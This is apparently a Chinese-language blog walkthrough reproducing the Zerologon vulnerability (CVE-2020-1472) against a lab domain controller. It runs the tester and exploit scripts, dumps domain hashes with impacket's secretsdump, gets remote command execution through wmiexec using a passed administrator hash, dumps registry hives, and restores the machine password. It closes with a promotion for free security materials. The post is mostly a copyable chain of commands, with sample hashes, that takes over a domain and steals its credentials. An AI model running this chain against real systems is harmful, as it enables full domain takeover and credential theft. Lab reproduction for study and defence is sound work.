CVE-2020-1472 复现

325 阅读1分钟

本地搭建一个域环境

image.png

image.png

使用 poc 验证

既然提示安装东西,那就 pip install -r requirements.txt ,之后再执行 python3 zerologon_tester.py <主机名>

image.png

使用 exp 攻击,但是这个时候很多人的脚本回报错,是因为缺少 impacket,github.com/SecureAuthC… ,python3 setup.py install //安装 impacket,然后执行 exp

python3 cve-2020-1472-exploit.py owa 192.168.137.137

image.png

使用 impacket 的 secretsdump.py 导出域控制上的 hash

python3 secretsdump.py god.org/owa$@192.168.137.137 -no-pass

image.png

利用获取到的管理员 hash 来远程操作域控服务器

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13cf6cfe1f2fc41cd286c7c8caec978b god.org/liukaifeng01@192.168.137.137

image.png

image.png

image.png

获取管理员 hash,远程连接导出 sam 数据库中的原来的计算机 hash

image.png

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

image.png

恢复计算机的 hash

下载脚本 github.com/risksense/z…

python3 reinstall_original_pw.py owa 192.168.137.137 ad611ebf4fd2de9448a33ba693b212f4 //注意 hash 的部分,只有后半部分

image.png

恢复计算机的 hash

使用 impacket 的脚本来登录域控来验证 hash

使用 7 步骤的脚本回复 hash 前

image.png

使用 7 步骤脚本恢复 hash 后

image.png

白嫖网安学习资料

0d1f4a081d0393a0a93bd96f61fe03c4.jpeg